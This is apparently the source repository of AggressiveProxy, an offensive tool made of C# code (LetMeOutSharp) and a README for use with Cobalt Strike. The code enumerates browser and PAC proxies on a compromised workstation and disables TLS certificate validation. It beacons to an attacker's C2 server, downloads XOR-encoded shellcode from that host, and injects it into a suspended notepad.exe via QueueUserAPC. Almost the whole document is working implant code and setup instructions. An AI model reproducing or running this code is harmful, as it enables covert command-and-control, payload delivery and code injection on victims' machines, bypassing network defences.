config.URL.ToString()); 479 | #endif 480 | List ret = new List(); 481 | try 482 | { 483 | string pacData = GetHTTP(config.URL, null, config.UserAgent); 484 | 485 | if (!pacData.Contains("PROXY ")) 486 | { 487 | return ret; 488 | } 489 | 490 | System.Text.RegularExpressions.Regex 491 | rx = new System.Text.RegularExpressions.Regex(@"PROXY (.*?):(\d+)"); 492 | 493 | System.Text.RegularExpressions.MatchCollection matches = rx.Matches(pacData); 494 | foreach (System.Text.RegularExpressions.Match match in matches) 495 | { 496 | Uri srv = string.Format("{0}:{1}", match.Groups[1].Value, match.Groups[2].Value).ToUri(); 497 | if (!ret.Any(x => x.URL.Equals(srv))) 498 | { 499 | //if winhttp convert to IE 500 | if (config.UserAgent.Equals(UserAgents.WHUA)) 501 | config.UserAgent = UserAgents.EDUA; 502 | ret.Add(new ConfigPair { URL = srv, UserAgent = config.UserAgent }); 503 | } 504 | } 505 | } 506 | catch (Exception ex) 507 | { 508 | #if DEBUG 509 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 510 | #endif 511 | } 512 | #if DEBUG 513 | Console.WriteLine("\tProxies: {0}", ret.Count); 514 | foreach (var proxy in ret) 515 | { 516 | Console.WriteLine("{0}", proxy); 517 | } 518 | #endif 519 | return ret; 520 | } 521 | 522 | //Get proxies for Chrome, Firefox, IE 523 | public static List GetProxies() 524 | { 525 | #if DEBUG 526 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 527 | #endif 528 | //Get all Proxies in a list 529 | 530 | List proxies = new List(); 531 | try 532 | { 533 | proxies.AddRange(GetChromeProxy()); 534 | proxies.AddRange(GetFirefoxProxy()); 535 | proxies.AddRange(GetIEProxy()); 536 | } 537 | catch (Exception ex) 538 | { 539 | #if DEBUG 540 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 541 | #endif 542 | } 543 | #if DEBUG 544 | Console.WriteLine("GetProxies: {0}", proxies.Count); 545 | #endif 546 | return proxies; 547 | } 548 | 549 | //Extract proxy configuration from commandline 550 | private 
static string GetCommandLine(this System.Diagnostics.Process process) 551 | { 552 | try 553 | { 554 | string cmdLine = null; 555 | using (var searcher = new System.Management.ManagementObjectSearcher( 556 | string.Format("SELECT CommandLine FROM Win32_Process WHERE ProcessId = {0}", process.Id))) 557 | { 558 | var matchEnum = searcher.Get().GetEnumerator(); 559 | if (matchEnum.MoveNext()) 560 | { 561 | cmdLine = matchEnum.Current["CommandLine"]?.ToString(); 562 | } 563 | } 564 | if (cmdLine != null && cmdLine.Contains("proxy")) 565 | { 566 | System.Text.RegularExpressions.Regex pattern = 567 | new System.Text.RegularExpressions.Regex(@"proxy-server=[^\s]*"); 568 | System.Text.RegularExpressions.Match match = pattern.Match(cmdLine); 569 | #if DEBUG 570 | Console.WriteLine("\tProxy from cmd: {0}", match.ToString().TrimStart('"').TrimEnd('"')); 571 | #endif 572 | return match.ToString().Replace("proxy-server=", "").TrimStart('"').TrimEnd('"'); 573 | } 574 | } 575 | catch (Exception ex) 576 | { 577 | #if DEBUG 578 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 579 | #endif 580 | } 581 | 582 | return ""; 583 | } 584 | 585 | public static string GetHTTP(Uri url, ConfigPair config) 586 | { 587 | return GetHTTP(url, config.URL, config.UserAgent); 588 | } 589 | 590 | //Do HTTP requests 591 | public static string GetHTTP(Uri url, Uri proxySrv = null, string userAgent = "") 592 | { 593 | #if DEBUG 594 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 595 | Console.WriteLine("\tProxy to use: {0}", proxySrv); 596 | Console.WriteLine("\tUA to use: {0}", userAgent); 597 | #endif 598 | 599 | try 600 | { 601 | //var target = url; 602 | System.Net.ServicePointManager.ServerCertificateValidationCallback += 603 | new System.Net.Security.RemoteCertificateValidationCallback(ValidateRemoteCertificate); 604 | 605 | System.Net.IWebProxy proxy = null; 606 | 607 | if (proxySrv == null) 608 | { 609 | proxy = new System.Net.WebProxy(); 610 | } 611 | 
else 612 | { 613 | proxy = new System.Net.WebProxy(proxySrv); 614 | } 615 | 616 | var credentials = System.Net.CredentialCache.DefaultCredentials; 617 | proxy.Credentials = credentials; //Set credentials for passthrough auth to proxy 618 | 619 | System.Net.HttpWebRequest request = (System.Net.HttpWebRequest)System.Net.WebRequest.Create(url); 620 | request.Proxy = proxy; 621 | if (!string.IsNullOrEmpty(userAgent)) 622 | { 623 | request.UserAgent = userAgent; 624 | } 625 | 626 | request.Credentials = System.Net.CredentialCache.DefaultCredentials; 627 | request.Timeout = 15000; 628 | 629 | System.Net.HttpWebResponse response = (System.Net.HttpWebResponse)request.GetResponse(); 630 | Stream resStream = response.GetResponseStream(); 631 | StreamReader readStream = new StreamReader(resStream, Encoding.UTF8); 632 | var data = readStream.ReadToEnd(); 633 | response.Close(); 634 | readStream.Close(); 635 | if (!string.IsNullOrEmpty(data)) 636 | { 637 | #if DEBUG 638 | Console.WriteLine("\tResponse Data: {0}", data); 639 | #endif 640 | return data; 641 | } 642 | } 643 | catch (System.Net.WebException ex) 644 | { 645 | #if DEBUG 646 | Console.WriteLine("\tHTTP Error: {0}", ex.Message); 647 | #endif 648 | } 649 | catch (Exception ex) 650 | { 651 | #if DEBUG 652 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 653 | #endif 654 | } 655 | return ""; 656 | } 657 | 658 | public static bool DoHTTP(Uri url, string response, string info, ConfigPair config) 659 | { 660 | #if DEBUG 661 | Console.WriteLine(System.Reflection.MethodBase.GetCurrentMethod().Name); 662 | #endif 663 | try 664 | { 665 | Uri urlrequest = new Uri(string.Format("{0}?{1}", url.ToString(), info)); 666 | var resp = GetHTTP(urlrequest, config.URL, config.UserAgent); 667 | if (!string.IsNullOrEmpty(resp)) 668 | { 669 | if (resp.Contains(response)) 670 | { 671 | #if DEBUG 672 | Console.WriteLine("\tCanTalk: true"); 673 | #endif 674 | return true; 675 | } 676 | else 677 | { 678 | #if DEBUG 679 | 
Console.WriteLine("\tConnection success, but response not the same."); 680 | #endif 681 | return false; 682 | } 683 | } 684 | return false; 685 | } 686 | catch (Exception ex) 687 | { 688 | #if DEBUG 689 | Console.WriteLine("[*] An exception occured: {0}", ex); 690 | #endif 691 | return false; 692 | } 693 | } 694 | 695 | // Accept all certificates 696 | private static bool ValidateRemoteCertificate(object sender, 697 | System.Security.Cryptography.X509Certificates.X509Certificate certificate, 698 | System.Security.Cryptography.X509Certificates.X509Chain chain, 699 | System.Net.Security.SslPolicyErrors policyErrors) 700 | { 701 | return true; 702 | } 703 | 704 | } 705 | } -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Injector.cs: -------------------------------------------------------------------------------- 1 | using System.Runtime.InteropServices; 2 | using System; 3 | 4 | namespace LetMeOutSharp 5 | { 6 | public class ApcInjectionNewProcess 7 | { 8 | public ApcInjectionNewProcess(byte[] shellcode) 9 | { 10 | 11 | // Target process to inject into 12 | string processpath = @"C:\Windows\notepad.exe"; 13 | if (Utilities.Is64BitProcess.Equals("0")) 14 | { 15 | processpath = @"c:\Windows\SysWOW64\notepad.exe"; 16 | } 17 | STARTUPINFO si = new STARTUPINFO(); 18 | PROCESS_INFORMATION pi = new PROCESS_INFORMATION(); 19 | 20 | // Create new process in suspended state to inject into 21 | CreateProcess(processpath, null, IntPtr.Zero, IntPtr.Zero, false, ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi); 22 | 23 | // Allocate memory within process and write shellcode 24 | IntPtr address = VirtualAllocEx(pi.hProcess, IntPtr.Zero, shellcode.Length, MEM_COMMIT, PAGE_READWRITE); 25 | IntPtr bytesWritten = IntPtr.Zero; 26 | WriteProcessMemory(pi.hProcess, address, shellcode, shellcode.Length, out bytesWritten); 27 | 28 | // Modify memory permissions on allocated shellcode 29 | uint oldProtect = 
0; 30 | VirtualProtectEx(pi.hProcess, address, shellcode.Length, PAGE_EXECUTE_READ, out oldProtect); 31 | 32 | // Open thread 33 | IntPtr thread = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId); 34 | 35 | // Assign address of shellcode to the target thread apc queue 36 | QueueUserAPC(address, thread, IntPtr.Zero); 37 | 38 | // Resume the suspended thread 39 | ResumeThread(pi.hThread); 40 | } 41 | 42 | private static UInt32 MEM_COMMIT = 0x1000; 43 | private static UInt32 PAGE_READWRITE = 0x04; 44 | private static UInt32 PAGE_EXECUTE_READ = 0x20; 45 | 46 | public struct STARTUPINFO 47 | { 48 | public uint cb; 49 | public string lpReserved; 50 | public string lpDesktop; 51 | public string lpTitle; 52 | public uint dwX; 53 | public uint dwY; 54 | public uint dwXSize; 55 | public uint dwYSize; 56 | public uint dwXCountChars; 57 | public uint dwYCountChars; 58 | public uint dwFillAttribute; 59 | public uint dwFlags; 60 | public short wShowWindow; 61 | public short cbReserved2; 62 | public IntPtr lpReserved2; 63 | public IntPtr hStdInput; 64 | public IntPtr hStdOutput; 65 | public IntPtr hStdError; 66 | } 67 | 68 | public struct PROCESS_INFORMATION 69 | { 70 | public IntPtr hProcess; 71 | public IntPtr hThread; 72 | public uint dwProcessId; 73 | public uint dwThreadId; 74 | } 75 | 76 | [Flags] 77 | public enum ProcessCreationFlags : uint 78 | { 79 | ZERO_FLAG = 0x00000000, 80 | CREATE_BREAKAWAY_FROM_JOB = 0x01000000, 81 | CREATE_DEFAULT_ERROR_MODE = 0x04000000, 82 | CREATE_NEW_CONSOLE = 0x00000010, 83 | CREATE_NEW_PROCESS_GROUP = 0x00000200, 84 | CREATE_NO_WINDOW = 0x08000000, 85 | CREATE_PROTECTED_PROCESS = 0x00040000, 86 | CREATE_PRESERVE_CODE_AUTHZ_LEVEL = 0x02000000, 87 | CREATE_SEPARATE_WOW_VDM = 0x00001000, 88 | CREATE_SHARED_WOW_VDM = 0x00001000, 89 | CREATE_SUSPENDED = 0x00000004, 90 | CREATE_UNICODE_ENVIRONMENT = 0x00000400, 91 | DEBUG_ONLY_THIS_PROCESS = 0x00000002, 92 | DEBUG_PROCESS = 0x00000001, 93 | DETACHED_PROCESS = 0x00000008, 94 | 
EXTENDED_STARTUPINFO_PRESENT = 0x00080000, 95 | INHERIT_PARENT_AFFINITY = 0x00010000 96 | } 97 | 98 | [Flags] 99 | public enum ThreadAccess : int 100 | { 101 | TERMINATE = 0x0001, 102 | SUSPEND_RESUME = 0x0002, 103 | GET_CONTEXT = 0x0008, 104 | SET_CONTEXT = 0x0010, 105 | SET_INFORMATION = 0x0020, 106 | QUERY_INFORMATION = 0x0040, 107 | SET_THREAD_TOKEN = 0x0080, 108 | IMPERSONATE = 0x0100, 109 | DIRECT_IMPERSONATION = 0x0200 110 | } 111 | 112 | [DllImport("kernel32.dll")] 113 | private static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, ProcessCreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); 114 | 115 | [DllImport("kernel32.dll")] 116 | private static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, Int32 dwSize, UInt32 flAllocationType, UInt32 flProtect); 117 | 118 | [DllImport("kernel32.dll")] 119 | private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, int nSize, out IntPtr lpNumberOfBytesWritten); 120 | 121 | [DllImport("kernel32.dll")] 122 | private static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect); 123 | 124 | [DllImport("kernel32.dll")] 125 | private static extern IntPtr OpenThread(ThreadAccess dwDesiredAccess, bool bInheritHandle, int dwThreadId); 126 | 127 | [DllImport("kernel32.dll")] 128 | private static extern IntPtr QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); 129 | 130 | [DllImport("kernel32.dll")] 131 | private static extern uint ResumeThread(IntPtr hThread); 132 | } 133 | } 134 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/LetMeOutSharp.csproj: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Debug 5 | anycpu 6 | {7B0A5CB5-5192-4469-95E8-FF127F4E2FEF} 7 | Exe 8 | LetMeOutSharp 9 | LetMeOutSharp 10 | v3.5 11 | 12 | 13 | true 14 | full 15 | false 16 | bin\Debug 17 | DEBUG; 18 | prompt 19 | 4 20 | true 21 | 22 | 23 | true 24 | bin\Release 25 | prompt 26 | 4 27 | true 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Program_template.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | 4 | namespace LetMeOutSharp 5 | { 6 | public class MainClass 7 | { 8 | public static void Main(string[] args) 9 | { 10 | var canTalk = false; 11 | 12 | Uri C2 = new Uri("%C2URL%"); 13 | const string responseFromCheckurl = "%RESPONSE%"; // check response from our server 14 | 15 | if (!canTalk) 16 | { 17 | var proxies = new List(); 18 | proxies.AddRange(Enumerator.GetProxiesFromPAC()); 19 | proxies.AddRange(Enumerator.GetProxies()); 20 | proxies.Add(new ConfigPair { URL = null, UserAgent = UserAgents.EDUA }); 21 | proxies.Add(new ConfigPair { URL = null, UserAgent = UserAgents.CHUA }); 22 | proxies.Add(new ConfigPair { URL = null, UserAgent = UserAgents.FFUA }); 23 | #if DEBUG 24 | Console.WriteLine("\nWill try {0} connectivity methods", proxies.Count); 25 | foreach (var proxy in proxies) 26 | { 27 | Console.WriteLine(proxy); 28 | } 29 | #endif 30 | foreach (var proxy in proxies) 31 | { 32 | try 33 | { 34 | // a = base64 encoded proxy url, b = base64 encoded user agent, c = 1 for 64-bit or 0 for 32-bit 35 | var info = string.Format("a={0}&b={1}&c={2}", proxy.URLString.ToBase64(), proxy.UserAgent.ToBase64(), Utilities.Is64BitProcess); 36 | if (Enumerator.DoHTTP(C2, responseFromCheckurl, info, proxy)) 37 | { 38 | canTalk = true; 39 | #if DEBUG 40 | 
Console.WriteLine("Success with: {0}", proxy); 41 | #endif 42 | 43 | // Adding a small delay waiting for the shellcode to be generated - if you are getting errors in artifact_payload you may need to increase it 44 | System.Threading.Thread.Sleep(10000); 45 | string variant = ""; 46 | if (proxy.UserAgent.Equals(UserAgents.EDUA)) 47 | { 48 | variant = "edge"; //This value should match with the value in AggressiveProxy.cna and your Malleable profile variant 49 | } 50 | else if (proxy.UserAgent.Equals(UserAgents.CHUA)) 51 | { 52 | variant = "chrome"; //This value should match with the value in AggressiveProxy.cna and your Malleable profile variant 53 | } 54 | else if (proxy.UserAgent.Equals(UserAgents.FFUA)) 55 | { 56 | variant = "firefox"; //This value should match with the value in AggressiveProxy.cna and your Malleable profile variant 57 | } 58 | string arch = "x64"; 59 | if (Utilities.Is64BitProcess.Equals("0")) 60 | { 61 | arch = "x86"; 62 | } 63 | Uri shellcodeUrl = new Uri(string.Format("{0}/{1}{2}{3}", C2.GetLeftPart(UriPartial.Authority), proxy.URLString.ToBase64(), variant.ToBase64(), arch.ToBase64())); 64 | #if DEBUG 65 | Console.WriteLine("Will request: {0}", shellcodeUrl); 66 | #endif 67 | string shresponse = Enumerator.GetHTTP(shellcodeUrl, proxy); 68 | #if DEBUG 69 | Console.WriteLine("Shellcode length: {0}", shresponse.Length); 70 | #endif 71 | byte[] values = shresponse.ConvertHexStringToByteArray(); 72 | 73 | for (int i = 0; i < values.Length; i++) 74 | { 75 | values[i] = (byte)(values[i] ^ 0x2a); // If XOR keys gets changed in the AggressorScript, make sure to change it here as well 76 | } 77 | new ApcInjectionNewProcess(values); 78 | break; 79 | } 80 | } 81 | catch (Exception ex) 82 | { 83 | #if DEBUG 84 | Console.WriteLine("[*] An exception occured: {0}", ex.Message); 85 | #endif 86 | } 87 | } 88 | #if DEBUG 89 | Console.WriteLine("Finish..."); 90 | #endif 91 | } 92 | } 93 | } 94 | } 
-------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | 4 | // Information about this assembly is defined by the following attributes. 5 | // Change them to the values specific to your project. 6 | 7 | [assembly: AssemblyTitle("")] 8 | [assembly: AssemblyDescription("")] 9 | [assembly: AssemblyConfiguration("")] 10 | [assembly: AssemblyCompany("")] 11 | [assembly: AssemblyProduct("")] 12 | [assembly: AssemblyCopyright("")] 13 | [assembly: AssemblyTrademark("")] 14 | [assembly: AssemblyCulture("")] 15 | 16 | // The assembly version has the format "{Major}.{Minor}.{Build}.{Revision}". 17 | // The form "{Major}.{Minor}.*" will automatically update the build and revision, 18 | // and "{Major}.{Minor}.{Build}.*" will update just the revision. 19 | 20 | [assembly: AssemblyVersion("1.0.*")] 21 | 22 | // The following attributes are used to specify the signing key for the assembly, 23 | // if desired. See the Mono documentation for more information about signing. 24 | 25 | //[assembly: AssemblyDelaySign(false)] 26 | //[assembly: AssemblyKeyFile("")] 27 | -------------------------------------------------------------------------------- /LetMeOutSharp/LetMeOutSharp/Utilities.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Globalization; 3 | using System.Text; 4 | 5 | namespace LetMeOutSharp 6 | { 7 | public static class Utilities 8 | { 9 | //Am I a 64 or 32-bit process? 10 | public static string Is64BitProcess 11 | { 12 | get { return IntPtr.Size == 8 ? 
"1" : "0"; } 13 | } 14 | 15 | public static Uri ToUri(this string str) 16 | { 17 | Uri url = new System.Net.WebProxy(str).Address; 18 | return url; 19 | } 20 | 21 | public static string ToBase64(this string str) 22 | { 23 | return Convert.ToBase64String(Encoding.ASCII.GetBytes(str)); 24 | } 25 | 26 | public static byte[] ConvertHexStringToByteArray(this string hexString) 27 | { 28 | if (hexString.Length % 2 != 0) 29 | { 30 | throw new ArgumentException(String.Format(CultureInfo.InvariantCulture, 31 | "The binary key cannot have an odd number of digits: {0}", hexString)); 32 | } 33 | 34 | byte[] data = new byte[hexString.Length / 2]; 35 | for (int index = 0; index < data.Length; index++) 36 | { 37 | string byteValue = hexString.Substring(index * 2, 2); 38 | data[index] = Byte.Parse(byteValue, NumberStyles.HexNumber, 39 | CultureInfo.InvariantCulture); 40 | } 41 | 42 | return data; 43 | } 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # AggressiveProxy 2 | AggressiveProxy is a combination of a .NET 3.5 binary (**LetMeOutSharp**) and a Cobalt Strike aggressor script (**AggressiveProxy.cna**). Once LetMeOutSharp is executed on a workstation, it will try to enumerate all available proxy configurations and try to communicate with the Cobalt Strike server over HTTP(s) using the identified proxy configurations. 3 | 4 | The story behind the tool can be found at [EncodeGroup's Medium](https://medium.com/encode-threat-labs/aggressiveproxy-a-tale-of-two-proxies-and-a-sad-beacon-43042a04a0d0) 5 | 6 | ## Requirements 7 | * CobaltStrike 4.1 8 | * Mono Framework 9 | 10 | ## Instructions 11 | * Modify the `$msbuild` value in AggressiveProxy.cna to point to the path of msbuild executable which is part of the Mono Framework 12 | * Click on the *Proxy Handler->Start Handler* menu item. 
At this point the script will request the listener, the proxy handler URL and the expected response content settings. 13 | * Once these values have been set, the script will then: 14 | * Replace `%C2URL%` and `%RESPONSE%` placeholders inside `Program_template.cs` and create the `Program.cs` file 15 | * Invoke MSBuild in order to build the .NET binary LetMeOutSharp 16 | * The script will then create a web page at the provided `Check URL`. Once a hit has been made to the specific URL from LetMeOutSharp, it will then: 17 | * Try to decode the base64 parameters of the GET request and extract the proxy address:port, the UserAgent and the architecture (x86/x64). 18 | * Try to match the UserAgent it received and pick a proper Malleable variant. If you want the generated shellcode to use the appropriate User-Agent, you will need to create the following variants: 19 | * "chrome" 20 | * "firefox" 21 | * "edge" 22 | 23 | If there are no variants configured, the default one should be used. The new variants should have **exactly the same configuration** as the variant your listener is/will be using, with the addition of the appropriate `header "User-Agent"` line in the `client` part. 24 | For example if your listener is using the following profile: 25 | ``` 26 | http-get { 27 | set uri "/test/"; 28 | set verb "GET"; 29 | client { 30 | header "Accept" "*/*"; 31 | header "Accept-Encoding" "gzip, deflate"; 32 | metadata { 33 | base64url; 34 | prepend "user="; 35 | header "Cookie"; 36 | } 37 | } 38 | server { 39 | header "Server" "Server"; 40 | header "Content-Type" "application/text"; 41 | header "Connection" "keep-alive"; 42 | output { 43 | print; 44 | } 45 | } 46 | } 47 | ``` 48 | You will need to define the following variants: 49 | ``` 50 | http-get "chrome" { 51 | .... 52 | client { 53 | .... 54 | header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"; 55 | .... 56 | } 57 | server { 58 | .... 
    }
}
http-get "firefox" {
    ....
    client {
        ....
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0";
        ....
    }
    server {
        ....
    }
}
http-get "edge" {
    ....
    client {
        ....
        header "User-Agent" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Edge/86.0.622.51";
        ....
    }
    server {
        ....
    }
}
```

* AggressiveProxy.cna will then set up a new temporary listener with the custom proxy configuration. The following exception will be logged: `java.lang.RuntimeException: Another Beacon listener exists on your cobalt console`. This is normal, as we will be using the temporary listener in order to create the shellcode with the custom proxy configuration. After generating the shellcode, the listener will be deleted.
* A new URL will be created to host the shellcode, which is XOR encrypted and in hex form.
* LetMeOutSharp will then fetch the shellcode and try to inject it into a new process. Currently, as a POC, LetMeOutSharp will perform a QueueUserAPC injection into a newly spawned process of our favorite process `notepad.exe`. Feel free to modify `Injector.cs` to your taste.

## Menu options
The CNA will create a menu with the following items:
* *Start Handler* is responsible for defining the listener that LetMeOutSharp will try to communicate with, the URL that it will try to reach, as well as the expected response from the web server. After defining the settings, it will host the proxy handling URL on the Cobalt Strike web server.
* *Stop Handler* will remove the proxy handling URL and any hosted generated shellcode.

## Extra Configuration

* By modifying the `$buildver` variable in the AggressiveProxy CNA, you can build a Debug version of LetMeOutSharp, which is more verbose and will print out all the relevant information it gathers. This should be used only for testing purposes.
* Currently, the AggressiveProxy CNA is using impenetrable encryption for the hosted shellcode, with the use of a hardcoded XOR key. This can be modified via the `$xordata` variable. You should also replace the line `values[i] = (byte)(values[i] ^ 0x2a);` in Program_template.cs accordingly.

## Notes
An effort has been made to test multiple cases of proxy configurations / technologies. This however does not mean that all cases have been accounted for. If you feel you have found a case that LetMeOutSharp does not take into account, feel free to open an issue or a merge request.

## Authors

[@cirrusj](https://github.com/cirrusj)

[@leftp](https://github.com/leftp)

--------------------------------------------------------------------------------
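
The hardcoded single-byte XOR key described under *Extra Configuration* only obfuscates the hosted payload. The following Python triage helper is an added example (not part of the AggressiveProxy project) that a defender could run over a captured HTTP response body to recover the key without knowing it. The sample body is constructed and inert, and the zero-byte frequency heuristic and all function names are assumptions of this example.

```python
import binascii
from collections import Counter

HEX_DIGITS = set(b"0123456789abcdefABCDEF")

def looks_like_hex_blob(body: bytes, min_len: int = 64) -> bool:
    """True when the whole body is one even-length run of hex digits."""
    body = body.strip()
    return (len(body) >= min_len and len(body) % 2 == 0
            and all(c in HEX_DIGITS for c in body))

def recover_single_byte_xor(body: bytes):
    """Return (key, plaintext) for a hex body XORed with one repeating byte.

    Assumption: machine code and PE data contain more 0x00 bytes than any
    other value, so the most frequent ciphertext byte is the key itself.
    """
    raw = binascii.unhexlify(body.strip())
    key = Counter(raw).most_common(1)[0][0]
    return key, bytes(b ^ key for b in raw)

def triage(body: bytes):
    """Summarise a suspicious response body, or None if it is not a hex blob."""
    if not looks_like_hex_blob(body):
        return None
    key, plain = recover_single_byte_xor(body)
    return {
        "key": key,
        "zero_ratio": plain.count(0) / len(plain),
        "starts_with": plain[:2],
    }

def constructed_sample(key: int = 0x2A) -> bytes:
    """Constructed, inert stand-in for a captured body (not real shellcode)."""
    plain = b"MZ" + b"\x00" * 58 + b"This program cannot be run in DOS mode."
    return binascii.hexlify(bytes(b ^ key for b in plain))

if __name__ == "__main__":
    print(triage(constructed_sample()))               # key recovered blind
    print(triage(b"<html><body>ok</body></html>"))    # ordinary page: None
```

A body that is nothing but hex digits is already unusual for web traffic, so `looks_like_hex_blob` on its own is a usable proxy or IDS signal before any decoding is attempted.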